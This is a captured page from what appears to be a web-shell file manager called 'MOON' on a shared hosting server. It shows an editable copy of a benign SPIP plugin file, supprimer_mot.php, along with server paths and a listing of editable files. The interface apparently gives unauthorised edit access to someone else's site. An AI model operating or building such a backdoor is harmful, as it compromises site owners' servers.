┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
webm008.cluster103.gra.hosting.ovh.net
LOCATION:
/home/paxmediccp/www/plugins-dist/mots/action
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: supprimer_mot.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion de l'action supprimer_mot * * @package SPIP\Mots\Actions */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Action supprimant un mot clé dans la base de données dont l'identifiant * est en argument de l'action sécurisée */ function action_supprimer_mot_dist() { $securiser_action = charger_fonction('securiser_action', 'inc'); $id_mot = $securiser_action(); include_spip('action/editer_mot'); mot_supprimer($id_mot); }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 editer_groupe_mots.php
PHP
4 KB
2026-04-27 15:55
EDIT
📄 editer_mot.php
PHP
8.8 KB
2026-04-27 15:55
EDIT
📄 supprimer_groupe_mots.php
PHP
1.7 KB
2026-04-27 15:55
EDIT
📄 supprimer_mot.php
PHP
1.1 KB
2026-04-27 15:55
EDIT